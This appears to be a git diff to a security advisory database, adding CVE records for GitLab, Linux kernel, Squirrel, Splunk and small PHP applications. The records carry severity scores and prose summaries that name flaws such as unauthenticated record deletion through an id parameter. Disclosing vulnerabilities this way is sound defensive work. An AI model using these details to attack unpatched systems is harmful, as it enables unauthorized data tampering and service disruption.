advisories/unreviewed/2026/02/GHSA-5qq8-6gv4-wmcc/GHSA-5qq8-6gv4-wmcc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-64jv-v62f-2xrg/GHSA-64jv-v62f-2xrg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6rjp-j8mc-4f57/GHSA-6rjp-j8mc-4f57.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6xrx-3vj8-2rjc/GHSA-6xrx-3vj8-2rjc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-78xc-39m5-v2c6/GHSA-78xc-39m5-v2c6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7fjm-558r-4j8r/GHSA-7fjm-558r-4j8r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7p94-766c-hgjp/GHSA-7p94-766c-hgjp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-876r-52fj-4pxf/GHSA-876r-52fj-4pxf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8j5g-3q2r-xfjh/GHSA-8j5g-3q2r-xfjh.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8rqj-9226-cwx7/GHSA-8rqj-9226-cwx7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9pjv-cqr5-4xh7/GHSA-9pjv-cqr5-4xh7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9wwr-2jh3-482p/GHSA-9wwr-2jh3-482p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-chpq-fr33-gp2m/GHSA-chpq-fr33-gp2m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f2fg-5m3g-hqwv/GHSA-f2fg-5m3g-hqwv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f5pv-9whq-7mv7/GHSA-f5pv-9whq-7mv7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f7pj-q7w5-89fg/GHSA-f7pj-q7w5-89fg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fqrv-m9rv-j33j/GHSA-fqrv-m9rv-j33j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g3vh-wfh4-fp76/GHSA-g3vh-wfh4-fp76.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h437-rr98-fx56/GHSA-h437-rr98-fx56.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hcrc-x9p4-f9jh/GHSA-hcrc-x9p4-f9jh.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j6h2-wr53-6vcg/GHSA-j6h2-wr53-6vcg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j87r-wgfm-7fjj/GHSA-j87r-wgfm-7fjj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jp99-8xc8-367m/GHSA-jp99-8xc8-367m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m34c-wrf8-mw69/GHSA-m34c-wrf8-mw69.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m4f3-qp2w-gwh6/GHSA-m4f3-qp2w-gwh6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m4v3-95xp-3j5h/GHSA-m4v3-95xp-3j5h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mx4x-pxgm-r77w/GHSA-mx4x-pxgm-r77w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p525-h9pq-233r/GHSA-p525-h9pq-233r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p68h-c56f-p3v6/GHSA-p68h-c56f-p3v6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w35p-gjc5-2g6r/GHSA-w35p-gjc5-2g6r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w94g-pmcx-r454/GHSA-w94g-pmcx-r454.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xw73-fccw-fgc4/GHSA-xw73-fccw-fgc4.json diff --git a/advisories/unreviewed/2022/05/GHSA-4gm2-v7j4-74p8/GHSA-4gm2-v7j4-74p8.json b/advisories/unreviewed/2022/05/GHSA-4gm2-v7j4-74p8/GHSA-4gm2-v7j4-74p8.json index 34296f8127264..18992c855b6e2 100644 --- a/advisories/unreviewed/2022/05/GHSA-4gm2-v7j4-74p8/GHSA-4gm2-v7j4-74p8.json +++ b/advisories/unreviewed/2022/05/GHSA-4gm2-v7j4-74p8/GHSA-4gm2-v7j4-74p8.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-4gm2-v7j4-74p8", - "modified": "2022-05-24T19:05:05Z", + "modified": "2026-02-18T18:30:19Z", "published": "2022-05-24T19:05:05Z", "aliases": [ "CVE-2021-22175" ], "details": "When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is disabled", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -25,6 +30,10 @@ { "type": "WEB", "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/294178" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-22175" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/07/GHSA-2764-3pqr-49w6/GHSA-2764-3pqr-49w6.json b/advisories/unreviewed/2023/07/GHSA-2764-3pqr-49w6/GHSA-2764-3pqr-49w6.json index 9f712b78b0ba9..a6f235ddebcc8 100644 --- a/advisories/unreviewed/2023/07/GHSA-2764-3pqr-49w6/GHSA-2764-3pqr-49w6.json +++ b/advisories/unreviewed/2023/07/GHSA-2764-3pqr-49w6/GHSA-2764-3pqr-49w6.json @@ -59,7 +59,8 @@ "database_specific": { "cwe_ids": [ "CWE-200", - "CWE-362" + "CWE-362", + "CWE-413" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2023/08/GHSA-9cmp-2g73-ff98/GHSA-9cmp-2g73-ff98.json b/advisories/unreviewed/2023/08/GHSA-9cmp-2g73-ff98/GHSA-9cmp-2g73-ff98.json index c5258203a0c0c..bfdaa829a47db 100644 --- a/advisories/unreviewed/2023/08/GHSA-9cmp-2g73-ff98/GHSA-9cmp-2g73-ff98.json +++ b/advisories/unreviewed/2023/08/GHSA-9cmp-2g73-ff98/GHSA-9cmp-2g73-ff98.json @@ -70,6 +70,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-1188", "CWE-843", "CWE-863" ], diff --git a/advisories/unreviewed/2023/11/GHSA-qhp7-446p-xq88/GHSA-qhp7-446p-xq88.json b/advisories/unreviewed/2023/11/GHSA-qhp7-446p-xq88/GHSA-qhp7-446p-xq88.json index 33a6aa0c2b5dc..18eb340f30b73 100644 --- a/advisories/unreviewed/2023/11/GHSA-qhp7-446p-xq88/GHSA-qhp7-446p-xq88.json +++ b/advisories/unreviewed/2023/11/GHSA-qhp7-446p-xq88/GHSA-qhp7-446p-xq88.json @@ -46,6 +46,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-366", "CWE-416" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2023/11/GHSA-xr9j-c7v6-7542/GHSA-xr9j-c7v6-7542.json b/advisories/unreviewed/2023/11/GHSA-xr9j-c7v6-7542/GHSA-xr9j-c7v6-7542.json index 363cea0377cd2..6a9fb9133ed39 100644 --- a/advisories/unreviewed/2023/11/GHSA-xr9j-c7v6-7542/GHSA-xr9j-c7v6-7542.json +++ b/advisories/unreviewed/2023/11/GHSA-xr9j-c7v6-7542/GHSA-xr9j-c7v6-7542.json @@ -126,6 +126,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-1341", "CWE-416" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2023/12/GHSA-v727-f437-6cxx/GHSA-v727-f437-6cxx.json b/advisories/unreviewed/2023/12/GHSA-v727-f437-6cxx/GHSA-v727-f437-6cxx.json index c09713c594b15..fe744acbd6aef 100644 --- a/advisories/unreviewed/2023/12/GHSA-v727-f437-6cxx/GHSA-v727-f437-6cxx.json +++ b/advisories/unreviewed/2023/12/GHSA-v727-f437-6cxx/GHSA-v727-f437-6cxx.json @@ -147,6 +147,7 @@ "database_specific": { "cwe_ids": [ "CWE-362", + "CWE-366", "CWE-416" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2024/01/GHSA-prhq-c3gx-jhwg/GHSA-prhq-c3gx-jhwg.json b/advisories/unreviewed/2024/01/GHSA-prhq-c3gx-jhwg/GHSA-prhq-c3gx-jhwg.json index f32e842d8d777..9ea353073359f 100644 --- a/advisories/unreviewed/2024/01/GHSA-prhq-c3gx-jhwg/GHSA-prhq-c3gx-jhwg.json +++ b/advisories/unreviewed/2024/01/GHSA-prhq-c3gx-jhwg/GHSA-prhq-c3gx-jhwg.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-416" + "CWE-416", + "CWE-911" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-2whf-r4r4-c662/GHSA-2whf-r4r4-c662.json b/advisories/unreviewed/2026/02/GHSA-2whf-r4r4-c662/GHSA-2whf-r4r4-c662.json index be50268e17c4d..bcba65ece4f7e 100644 --- a/advisories/unreviewed/2026/02/GHSA-2whf-r4r4-c662/GHSA-2whf-r4r4-c662.json +++ b/advisories/unreviewed/2026/02/GHSA-2whf-r4r4-c662/GHSA-2whf-r4r4-c662.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2whf-r4r4-c662", - "modified": "2026-02-03T09:30:28Z", + "modified": "2026-02-18T18:30:22Z", "published": "2026-02-03T09:30:28Z", "aliases": [ "CVE-2026-1592" diff --git a/advisories/unreviewed/2026/02/GHSA-365g-rr2h-rx65/GHSA-365g-rr2h-rx65.json b/advisories/unreviewed/2026/02/GHSA-365g-rr2h-rx65/GHSA-365g-rr2h-rx65.json new file mode 100644 index 0000000000000..414c99dc1227c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-365g-rr2h-rx65/GHSA-365g-rr2h-rx65.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-365g-rr2h-rx65", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-71234" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtl8xxxu: fix slab-out-of-bounds in rtl8xxxu_sta_add\n\nThe driver does not set hw->sta_data_size, which causes mac80211 to\nallocate insufficient space for driver private station data in\n__sta_info_alloc(). When rtl8xxxu_sta_add() accesses members of\nstruct rtl8xxxu_sta_info through sta->drv_priv, this results in a\nslab-out-of-bounds write.\n\nKASAN report on RISC-V (VisionFive 2) with RTL8192EU adapter:\n\n BUG: KASAN: slab-out-of-bounds in rtl8xxxu_sta_add+0x31c/0x346\n Write of size 8 at addr ffffffd6d3e9ae88 by task kworker/u16:0/12\n\nSet hw->sta_data_size to sizeof(struct rtl8xxxu_sta_info) during\nprobe, similar to how hw->vif_data_size is configured. This ensures\nmac80211 allocates sufficient space for the driver's per-station\nprivate data.\n\nTested on StarFive VisionFive 2 v1.2A board.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71234" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/116f7bd8160c6b37d1c6939385abf90f6f6ed2f5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5d810ba377eddee95d30766d360a14efbb3d1872" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/9a0f3fa6ecd0c9c32dbc367a57482bbf7c7d25bf" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3cgw-cpcx-p7g4/GHSA-3cgw-cpcx-p7g4.json b/advisories/unreviewed/2026/02/GHSA-3cgw-cpcx-p7g4/GHSA-3cgw-cpcx-p7g4.json index ed7c19f52426f..1b0108fbfed45 100644 --- a/advisories/unreviewed/2026/02/GHSA-3cgw-cpcx-p7g4/GHSA-3cgw-cpcx-p7g4.json +++ b/advisories/unreviewed/2026/02/GHSA-3cgw-cpcx-p7g4/GHSA-3cgw-cpcx-p7g4.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-377" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-3w2g-4qx3-2mmw/GHSA-3w2g-4qx3-2mmw.json b/advisories/unreviewed/2026/02/GHSA-3w2g-4qx3-2mmw/GHSA-3w2g-4qx3-2mmw.json new file mode 100644 index 0000000000000..b6f90184c3909 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3w2g-4qx3-2mmw/GHSA-3w2g-4qx3-2mmw.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3w2g-4qx3-2mmw", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-71232" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Free sp in error path to fix system crash\n\nSystem crash seen during load/unload test in a loop,\n\n[61110.449331] qla2xxx [0000:27:00.0]-0042:0: Disabled MSI-X.\n[61110.467494] =============================================================================\n[61110.467498] BUG qla2xxx_srbs (Tainted: G OE -------- --- ): Objects remaining in qla2xxx_srbs on __kmem_cache_shutdown()\n[61110.467501] -----------------------------------------------------------------------------\n\n[61110.467502] Slab 0x000000000ffc8162 objects=51 used=1 fp=0x00000000e25d3d85 flags=0x57ffffc0010200(slab|head|node=1|zone=2|lastcpupid=0x1fffff)\n[61110.467509] CPU: 53 PID: 455206 Comm: rmmod Kdump: loaded Tainted: G OE -------- --- 5.14.0-284.11.1.el9_2.x86_64 #1\n[61110.467513] Hardware name: HPE ProLiant DL385 Gen10 Plus v2/ProLiant DL385 Gen10 Plus v2, BIOS A42 08/17/2023\n[61110.467515] Call Trace:\n[61110.467516] \n[61110.467519] dump_stack_lvl+0x34/0x48\n[61110.467526] slab_err.cold+0x53/0x67\n[61110.467534] __kmem_cache_shutdown+0x16e/0x320\n[61110.467540] kmem_cache_destroy+0x51/0x160\n[61110.467544] qla2x00_module_exit+0x93/0x99 [qla2xxx]\n[61110.467607] ? __do_sys_delete_module.constprop.0+0x178/0x280\n[61110.467613] ? syscall_trace_enter.constprop.0+0x145/0x1d0\n[61110.467616] ? do_syscall_64+0x5c/0x90\n[61110.467619] ? exc_page_fault+0x62/0x150\n[61110.467622] ? entry_SYSCALL_64_after_hwframe+0x63/0xcd\n[61110.467626] \n[61110.467627] Disabling lock debugging due to kernel taint\n[61110.467635] Object 0x0000000026f7e6e6 @offset=16000\n[61110.467639] ------------[ cut here ]------------\n[61110.467639] kmem_cache_destroy qla2xxx_srbs: Slab cache still has objects when called from qla2x00_module_exit+0x93/0x99 [qla2xxx]\n[61110.467659] WARNING: CPU: 53 PID: 455206 at mm/slab_common.c:520 kmem_cache_destroy+0x14d/0x160\n[61110.467718] CPU: 53 PID: 455206 Comm: rmmod Kdump: loaded Tainted: G B OE -------- --- 5.14.0-284.11.1.el9_2.x86_64 #1\n[61110.467720] Hardware name: HPE ProLiant DL385 Gen10 Plus v2/ProLiant DL385 Gen10 Plus v2, BIOS A42 08/17/2023\n[61110.467721] RIP: 0010:kmem_cache_destroy+0x14d/0x160\n[61110.467724] Code: 99 7d 07 00 48 89 ef e8 e1 6a 07 00 eb b3 48 8b 55 60 48 8b 4c 24 20 48 c7 c6 70 fc 66 90 48 c7 c7 f8 ef a1 90 e8 e1 ed 7c 00 <0f> 0b eb 93 c3 cc cc cc cc 66 2e 0f 1f 84 00 00 00 00 00 55 48 89\n[61110.467725] RSP: 0018:ffffa304e489fe80 EFLAGS: 00010282\n[61110.467727] RAX: 0000000000000000 RBX: ffffffffc0d9a860 RCX: 0000000000000027\n[61110.467729] RDX: ffff8fd5ff9598a8 RSI: 0000000000000001 RDI: ffff8fd5ff9598a0\n[61110.467730] RBP: ffff8fb6aaf78700 R08: 0000000000000000 R09: 0000000100d863b7\n[61110.467731] R10: ffffa304e489fd20 R11: ffffffff913bef48 R12: 0000000040002000\n[61110.467731] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000\n[61110.467733] FS: 00007f64c89fb740(0000) GS:ffff8fd5ff940000(0000) knlGS:0000000000000000\n[61110.467734] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[61110.467735] CR2: 00007f0f02bfe000 CR3: 00000020ad6dc005 CR4: 0000000000770ee0\n[61110.467736] PKRU: 55555554\n[61110.467737] Call Trace:\n[61110.467738] \n[61110.467739] qla2x00_module_exit+0x93/0x99 [qla2xxx]\n[61110.467755] ? __do_sys_delete_module.constprop.0+0x178/0x280\n\nFree sp in the error path to fix the crash.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71232" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/05fcd590e5fbbb3e9e1b4fc6c23c98a1d38cf256" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/19ac050ef09a2f0a9d9787540f77bb45cf9033e8" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/aed16d37696f494288a291b4b477484ed0be774b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f04840512438ac025dea6e357d80a986b28bbe4c" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4mcw-fcqm-vqg3/GHSA-4mcw-fcqm-vqg3.json b/advisories/unreviewed/2026/02/GHSA-4mcw-fcqm-vqg3/GHSA-4mcw-fcqm-vqg3.json new file mode 100644 index 0000000000000..d86d7cbb0aaa8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4mcw-fcqm-vqg3/GHSA-4mcw-fcqm-vqg3.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4mcw-fcqm-vqg3", + "modified": "2026-02-18T18:30:41Z", + "published": "2026-02-18T18:30:41Z", + "aliases": [ + "CVE-2026-2659" + ], + "details": "A vulnerability was determined in Squirrel up to 3.2. Affected by this vulnerability is the function SQFuncState::PopTarget of the file src/squirrel/squirrel/sqfuncstate.cpp. Executing a manipulation of the argument _target_stack can lead to out-of-bounds read. It is possible to launch the attack on the local host. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2659" + }, + { + "type": "WEB", + "url": "https://github.com/albertodemichelis/squirrel/issues/311" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0122/blob/main/i311/repro" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346457" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346457" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753163" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4v8p-q39m-4pj8/GHSA-4v8p-q39m-4pj8.json b/advisories/unreviewed/2026/02/GHSA-4v8p-q39m-4pj8/GHSA-4v8p-q39m-4pj8.json new file mode 100644 index 0000000000000..9197d31f0a4f7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4v8p-q39m-4pj8/GHSA-4v8p-q39m-4pj8.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4v8p-q39m-4pj8", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-20137" + ], + "details": "In Splunk Enterprise versions below 10.2.0, 10.0.3, 9.4.5, 9.3.7, and 9.2.9, and Splunk Cloud Platform versions below 10.1.2507.0, 10.0.2503.9, 9.3.2411.112, and 9.3.2408.122, a low-privileged user who does not hold the \"admin\" or \"power\" Splunk roles could bypass the SPL safeguards for risky commands when they create a Data Model that contains an injected SPL query within an object. They can bypass the safeguards by exploiting a path traversal vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20137" + }, + { + "type": "WEB", + "url": "https://advisory.splunk.com/advisories/SVD-2026-0202" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4vmx-r9fj-4cm5/GHSA-4vmx-r9fj-4cm5.json b/advisories/unreviewed/2026/02/GHSA-4vmx-r9fj-4cm5/GHSA-4vmx-r9fj-4cm5.json new file mode 100644 index 0000000000000..81c8fc769fd04 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4vmx-r9fj-4cm5/GHSA-4vmx-r9fj-4cm5.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4vmx-r9fj-4cm5", + "modified": "2026-02-18T18:30:41Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-20139" + ], + "details": "In Splunk Enterprise versions below 10.2.0, 10.0.2, 9.4.8, 9.3.9, and 9.2.12, and Splunk Cloud Platform versions below 10.2.2510.3, 10.1.2507.8, 10.0.2503.9, and 9.3.2411.121, a low-privileged user that does not hold the \"admin\" or \"power\" Splunk roles could craft a malicious payload into the `realname`, `tz`, or `email` parameters of the `/splunkd/__raw/services/authentication/users/username` REST API endpoint when they change a password. This could potentially lead to a client‑side denial‑of‑service (DoS). The malicious payload might significantly slow page load times or render Splunk Web temporarily unresponsive.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20139" + }, + { + "type": "WEB", + "url": "https://advisory.splunk.com/advisories/SVD-2026-0204" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-55vh-w3p8-qq9g/GHSA-55vh-w3p8-qq9g.json b/advisories/unreviewed/2026/02/GHSA-55vh-w3p8-qq9g/GHSA-55vh-w3p8-qq9g.json new file mode 100644 index 0000000000000..5f43ff3dcbfb9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-55vh-w3p8-qq9g/GHSA-55vh-w3p8-qq9g.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-55vh-w3p8-qq9g", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-70141" + ], + "details": "SourceCodester Customer Support System 1.0 contains an incorrect access control vulnerability in ajax.php. The AJAX dispatcher does not enforce authentication or authorization before invoking administrative methods in admin_class.php based on the action parameter. An unauthenticated remote attacker can perform sensitive operations such as creating customers and deleting users (including the admin account), as well as modifying or deleting other application records (tickets, departments, comments), resulting in unauthorized data modification.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70141" + }, + { + "type": "WEB", + "url": "https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code" + }, + { + "type": "WEB", + "url": "https://youngkevinn.github.io/posts/CVE-2025-70141-Customer-Support-BAC" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T17:21:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5jgq-pv8m-5cx7/GHSA-5jgq-pv8m-5cx7.json b/advisories/unreviewed/2026/02/GHSA-5jgq-pv8m-5cx7/GHSA-5jgq-pv8m-5cx7.json new file mode 100644 index 0000000000000..95597dbc48090 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5jgq-pv8m-5cx7/GHSA-5jgq-pv8m-5cx7.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5jgq-pv8m-5cx7", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23226" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: add chann_lock to protect ksmbd_chann_list xarray\n\nksmbd_chann_list xarray lacks synchronization, allowing use-after-free in\nmulti-channel sessions (between lookup_chann_list() and ksmbd_chann_del).\n\nAdds rw_semaphore chann_lock to struct ksmbd_session and protects\nall xa_load/xa_store/xa_erase accesses.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23226" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/36ef605c0395b94b826a8c8d6f2697071173de6e" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e4a8a96a93d08570e0405cfd989a8a07e5b6ff33" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5pqm-c33h-22jc/GHSA-5pqm-c33h-22jc.json b/advisories/unreviewed/2026/02/GHSA-5pqm-c33h-22jc/GHSA-5pqm-c33h-22jc.json new file mode 100644 index 0000000000000..89bf8cfaa988e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5pqm-c33h-22jc/GHSA-5pqm-c33h-22jc.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5pqm-c33h-22jc", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-70146" + ], + "details": "Missing authentication in multiple administrative action scripts under /admin/ in ProjectWorlds Online Time Table Generator 1.0 allows remote attackers to perform unauthorized administrative operations (e.g.,adding records, deleting records) via direct HTTP requests to affected endpoints without a valid session.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70146" + }, + { + "type": "WEB", + "url": "https://projectworlds.com/online-time-table-generator-php-mysql" + }, + { + "type": "WEB", + "url": "https://youngkevinn.github.io/posts/CVE-2025-70146-OTTTG-Unauth-Deletion" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T17:21:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5q5x-wqxc-vv25/GHSA-5q5x-wqxc-vv25.json b/advisories/unreviewed/2026/02/GHSA-5q5x-wqxc-vv25/GHSA-5q5x-wqxc-vv25.json new file mode 100644 index 0000000000000..5ae2cdead35c8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5q5x-wqxc-vv25/GHSA-5q5x-wqxc-vv25.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5q5x-wqxc-vv25", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-70150" + ], + "details": "CodeAstro Membership Management System 1.0 contains a missing authentication vulnerability in delete_members.php that allows unauthenticated attackers to delete arbitrary member records via the id parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70150" + }, + { + "type": "WEB", + "url": "https://www.phpscriptsonline.com/product/membership-management-software" + }, + { + "type": "WEB", + "url": "https://youngkevinn.github.io/posts/CVE-2025-70150-Membership-Unauth-Delete" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:20Z" + } +} \ No newline at end of file diff --git 